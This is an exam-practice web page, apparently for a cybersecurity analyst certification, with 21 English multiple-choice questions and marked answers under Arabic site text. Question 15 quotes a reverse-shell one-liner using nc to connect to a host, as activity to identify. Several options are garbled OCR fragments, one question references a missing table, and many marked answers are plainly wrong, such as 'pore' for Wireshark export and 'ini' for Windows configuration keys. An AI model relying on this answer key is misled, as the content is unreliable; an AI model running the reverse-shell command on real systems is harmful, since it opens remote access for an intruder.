لا تريد أن تفوت شيئا؟

نصائح اجتياز امتحان الشهادة

آخر أخبار الامتحانات ومعلومات الخصم

برعاية وحديثة من قبل خبرائنا

نعم، أرسل لي النشرة الإخبارية

خذ اختبارات أخرى عبر الإنترنت

السؤال #1
When undertaking a cloud migration of multiple SaaS application, an organizations system administrator struggled … identity and access management to cloud- based assets. Which of the following service models would have reduced the complexity of this project?
A. CASB
B. SASE
C. ZTNA
D. SWG
عرض الإجابة
اجابة صحيحة: B
السؤال #2
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?
A. Change the display filter to f c
B. acciv
C. pore
D. Change the display filter to tcg
E. Change the display filter to f cp-daca and follow the TCP streams
F. Navigate to the File menu and select FTP from the Export objects option
عرض الإجابة
اجابة صحيحة: C
السؤال #3
A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the following tools can the analyst use to analyze the attack and prevent future attacks?
A. A web application firewall
B. A network intrusion detection system
C. A vulnerability scanner
D. A web proxy
عرض الإجابة
اجابة صحيحة: D
السؤال #4
A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?
A. Help desk
B. Law enforcement
C. Legal department
D. Board member
عرض الإجابة
اجابة صحيحة: A
السؤال #5
A security manager is looking at a third-party vulnerability metric (SMITTEN) to improve upon the company's current method that relies on CVSSv3. Given the following: Which of the following vulnerabilities should be prioritized?
A. Vulnerability 1
B. Vulnerability 2
C. Vulnerability 3
D. Vulnerability 4
عرض الإجابة
اجابة صحيحة: A
السؤال #6
Which of the following would help to minimize human engagement and aid in process improvement in security operations?
A. OSSTMM
B. SIEM
C. SOAR
D. QVVASP
عرض الإجابة
اجابة صحيحة: B
السؤال #7
During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?
A. Isolation
B. Remediation
C. Reimaging
D. Preservation
عرض الإجابة
اجابة صحيحة: C
السؤال #8
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?
A. Hard disk
B. Primary boot partition
C. Malicious tiles
D. Routing table
E. Static IP address
عرض الإجابة
اجابة صحيحة: C
السؤال #9
Which Of the following techniques would be best to provide the necessary assurance for embedded software that drives centrifugal pumps at a power Plant?
A. Containerization
B. Manual code reviews
C. Static and dynamic analysis
D. Formal methods
عرض الإجابة
اجابة صحيحة: B
السؤال #10
A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?
A. confi
B. ini
C. ntds
D. Master boot record
E. Registry
عرض الإجابة
اجابة صحيحة: B
السؤال #11
A company is in the process of implementing a vulnerability management program. no-lich of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?
A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning
عرض الإجابة
اجابة صحيحة: B
السؤال #12
A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Vulnerability 1: CVSS: 3.0/AV:N/AC: L/PR: N/UI : N/S: U/C: H/I : L/A:L Vulnerability 2: CVSS: 3.0/AV: L/AC: H/PR:N/UI : N/S: U/C: L/I : L/A: H Vulnerability 3: CVSS: 3.0/AV:A/AC: H/PR: L/UI : R/S: U/C: L/I : H/A:L Vulnerability 4: CVSS: 3.0/AV: P/AC: L/PR: H/UI : N/S: U/C: H/I:N/A:L Which of the following vulnerabilities should be patched first?
A. Vulnerability 1
B. Vulnerability 2
C. Vulnerability 3
D. Vulnerability 4
عرض الإجابة
اجابة صحيحة: A
السؤال #13
Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?
A. TO ensure the report is legally acceptable in case it needs to be presented in court
B. To present a lessons-learned analysis for the incident response team
C. To ensure the evidence can be used in a postmortem analysis
D. To prevent the possible loss of a data source for further root cause analysis
عرض الإجابة
اجابة صحيحة: B
السؤال #14
A cybersecurity analyst has recovered a recently compromised server to its previous state. Which of the following should the analyst perform next?
A. Eradication
B. Isolation
C. Reporting
D. Forensic analysis
عرض الإجابة
اجابة صحيحة: B
السؤال #15
A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity?
A. Network pivoting
B. Host scanning
C. Privilege escalation
D. Reverse shell
عرض الإجابة
اجابة صحيحة: D
السؤال #16
Which of the following is described as a method of enforcing a security policy between cloud customers and cloud services?
A. CASB
B. DMARC
C. SIEM
D. PAM
عرض الإجابة
اجابة صحيحة: A
السؤال #17
An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?
A. CDN
B. Vulnerability scanner
C. DNS
D. Web server
عرض الإجابة
اجابة صحيحة: D
السؤال #18
Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?
A. Risk register
B. Vulnerability assessment
C. Penetration test
D. Compliance report
عرض الإجابة
اجابة صحيحة: A
السؤال #19
Which of the following best describes the goal of a tabletop exercise?
A. To test possible incident scenarios and how to react properly
B. To perform attack exercises to check response effectiveness
C. To understand existing threat actors and how to replicate their techniques
D. To check the effectiveness of the business continuity plan
عرض الإجابة
اجابة صحيحة: A
السؤال #20
Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?
A. Mean time to detect
B. Mean time to respond
C. Mean time to remediate
D. Service-level agreement uptime
عرض الإجابة
اجابة صحيحة: D
السؤال #21
An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?
A. Impact
B. Vulnerability score
C. Mean time to detect
D. Isolation
عرض الإجابة
اجابة صحيحة: A

عرض الإجابات بعد التقديم

يرجى إرسال البريد الإلكتروني الخاص بك والواتس اب للحصول على إجابات الأسئلة.

ملحوظة: يرجى التأكد من صلاحية معرف البريد الإلكتروني وWhatsApp حتى تتمكن من الحصول على نتائج الاختبار الصحيحة.

بريد إلكتروني:
رقم الواتس اب/الهاتف: